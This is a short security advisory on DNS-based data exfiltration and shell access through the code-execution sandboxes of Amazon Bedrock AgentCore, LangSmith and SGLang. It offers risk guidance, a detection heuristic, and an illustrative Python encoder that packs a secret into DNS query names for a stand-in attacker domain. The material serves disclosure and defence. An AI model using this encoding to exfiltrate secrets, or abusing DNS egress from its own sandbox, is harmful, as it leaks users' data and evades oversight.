AI Sandbox Flaws in Amazon Bedrock, LangSmith, and SGLang Enable Data Exfiltration and Remote Code Execution
What Happened – Researchers from BeyondTrust discovered that the sandboxed code-execution environments of Amazon Bedrock's AgentCore Code Interpreter, as well as the LangSmith and SGLang runtimes, allow unrestricted outbound DNS queries. An attacker can abuse these queries to exfiltrate data and establish an interactive shell, effectively achieving remote code execution (RCE).
Why It Matters for TPRM –
- Cloud‑based AI services are increasingly embedded in third‑party applications, expanding the attack surface.
- DNS‑based exfiltration bypasses many traditional egress controls, exposing sensitive data to external actors.
- RCE in a shared AI execution environment can compromise downstream workloads and customers.
Who Is Affected – SaaS providers, enterprise developers, and any organization that integrates Amazon Bedrock, LangSmith, or SGLang into their products or internal workflows.
Recommended Actions – Review contracts and security clauses for AI‑as‑a‑Service (AIaaS) providers, enforce strict egress filtering for DNS, request evidence of sandbox hardening, and consider alternative AI runtimes until patches are verified.
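To make the egress-filtering recommendation concrete, the sketch below shows a simplified detection heuristic that could run over DNS query logs: exfiltration via DNS typically produces unusually long or high-entropy subdomain labels. The function names, thresholds, and example domains are hypothetical illustrations, not part of the disclosed research; real deployments would tune thresholds against baseline traffic and pair detection with resolver allowlisting.

```python
# Illustrative heuristic for spotting DNS-based exfiltration in query logs.
# Thresholds and names here are hypothetical; tune against real traffic.
import math
from collections import Counter

def shannon_entropy(s: str) -> float:
    """Bits of entropy per character in the string."""
    counts = Counter(s)
    return -sum((c / len(s)) * math.log2(c / len(s)) for c in counts.values())

def looks_like_exfil(qname: str, max_label: int = 40, max_entropy: float = 3.8) -> bool:
    """Flag query names whose subdomain labels are suspiciously long or random."""
    labels = qname.rstrip(".").split(".")[:-2]  # ignore the registered domain itself
    return any(len(l) > max_label or shannon_entropy(l) > max_entropy
               for l in labels if l)

print(looks_like_exfil("api.github.com"))  # → False
print(looks_like_exfil("abcdefghijklmnopqrstuvwxyz234567.evil.example"))  # → True
```

Length and entropy are coarse signals; they catch encoded payloads but will miss low-and-slow exfiltration, which is why the contractual and sandbox-hardening controls above still matter.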
Technical Notes – The vulnerability stems from a misconfigured sandbox that permits unrestricted outbound DNS traffic, providing a covert channel for data exfiltration and interactive shell access. No CVE has been assigned yet; the issue was disclosed as a zero-day. Source: The Hacker News
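To illustrate why outbound DNS alone is enough for a covert channel, the sketch below shows the general technique of packing arbitrary bytes into DNS query names: base32-encode the payload and split it into labels under the 63-byte DNS label limit. The domain and encoding scheme are hypothetical illustrations of the class of attack, not the specific exploit from the research, and no network traffic is generated here.

```python
# Illustrative sketch: smuggling bytes out through DNS lookups by packing
# them into subdomain labels. Domain is hypothetical; nothing is resolved.
import base64

ATTACKER_DOMAIN = "exfil.example.com"  # hypothetical attacker-controlled zone
MAX_LABEL = 63                         # DNS limits each label to 63 bytes

def to_dns_queries(payload: bytes) -> list[str]:
    """Encode a payload into a series of DNS query names."""
    encoded = base64.b32encode(payload).decode().rstrip("=").lower()
    chunks = [encoded[i:i + MAX_LABEL] for i in range(0, len(encoded), MAX_LABEL)]
    # A leading sequence-number label lets the attacker reassemble in order.
    return [f"{i}.{chunk}.{ATTACKER_DOMAIN}" for i, chunk in enumerate(chunks)]

queries = to_dns_queries(b"secret API key")
# A sandbox that permits outbound DNS would resolve these names, delivering
# each chunk to the attacker's authoritative name server for the zone.
```

Because the sandbox only needs to *resolve* these names, not connect to the attacker's server directly, conventional egress firewalls that allow DNS pass the data through unimpeded.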